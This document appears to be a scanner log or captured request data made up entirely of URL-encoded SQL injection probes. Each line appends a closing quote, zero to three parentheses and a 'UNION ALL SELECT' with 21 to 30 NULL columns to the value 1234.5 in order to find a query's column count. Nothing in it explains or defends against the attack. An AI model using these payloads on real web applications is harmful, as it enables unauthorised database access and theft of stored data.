1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 